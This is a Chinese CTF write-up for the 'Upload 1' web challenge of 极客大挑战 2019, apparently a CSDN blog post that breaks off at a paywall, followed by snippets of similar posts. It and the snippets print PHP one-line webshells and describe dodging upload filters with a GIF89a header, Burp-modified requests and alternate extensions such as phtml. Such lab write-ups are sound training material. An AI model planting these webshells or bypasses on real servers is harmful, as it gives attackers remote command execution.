[极客大挑战 2019]Upload 1做题记录

最新推荐文章于 2024-05-14 10:30:00 发布
最新推荐文章于 2024-05-14 10:30:00 发布
阅读量1.2k 收藏 2
点赞数 1
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45832949/article/details/115015157
版权

进入题目链接,首先看到的是需要我们上传一个文件。
在这里插入图片描述并且题目是upload,说明是要我们利用文件上传漏洞来获取flag。
我们首先创建一个文本文件,写上我们的一句话木马(eval($_POST[‘cmd’]😉),目的是之后用工具查看网页后端文件。
在这里插入图片描述试着上传phtml发现并没有上传成功,说明网页对前端检测
在这里插入图片描述然后我们修改文件后缀名为xx.jpg再试着上传一次也没有成功,说明网页也有后端检测
最后尝试在一句话木马前加上gif的文件头
在这里插入图片描述
上传成功
在这里插入图片描述然后重新上传,用bp进行抓包,修改上传文件的类型为phtml,只有这样才能使网页后端执行我们的一句话木马

最低0.47元/天 解锁文章
qq_45832949
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
[极客挑战 2019]Upload 1
qq_43618536的博客
07-02 748
BUUCTF的[极客挑战 2019]Upload 1
BUUCTF——[极客挑战2019]Upload-1
weixin_62248541的博客
11-25 499
BUUCTF-[极客挑战2019]Upload-1
文件上传漏洞(全网最详细)
最新发布
m0_59598029的博客
05-14 1015
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
BUUCTF——[极客挑战 2019]Upload 1
热门推荐
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
(文件上传upload) [极客挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 9323
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客挑战 2019]Upload1 ...
文件上传 [极客挑战 2019]Upload 1
m0_75178803的博客
10-11 985
上传失败了,应该是在后端也对我们的文件内容进行了检测,检测到我们的一句话木马里面包含
【BUUCTF】[极客挑战 2019]Upload1
aoao331198的博客
03-13 958
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
极客班 C++专业期末综合测试题1
08-03
1. **类的定义**: 类是C++中的一个核心概念,它允许我们封装数据和操作这些数据的方法。在这个例子中,`Shape`、`Point`和`Polygon`都是类,其中`Polygon`继承自`Shape`。 2. **构造函数与析构函数**: - `Shape...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
leetcode题库-LeetCode_Study:LeetCode做题记录
06-29
LeetCode做题记录,该仓库主要用于督促自己刷题。 让刷题具有一定的仪式感 ^_^ 做题策略 把题目读懂,理解题意。 想出尽量多的解题思路。 若想出了解则可以开始做了,若想不出则直接看LeetCode的题解,学习别人是...
极客学院 idea教程 含2017.1版本 PDF及两个视频
11-16
【标题】"极客学院 idea教程 含2017.1版本 PDF及两个视频" 涵盖了IntelliJ IDEA的使用方法和实践,是针对2017.1版本的详细教学资源。IntelliJ IDEA是一款流行的Java集成开发环境(IDE),由JetBrains公司开发,广泛...
BUUFCTF—[极客挑战 2019]Upload 1
good good study
05-12 1092
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 756
文件上传冲啊!!!!!!
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值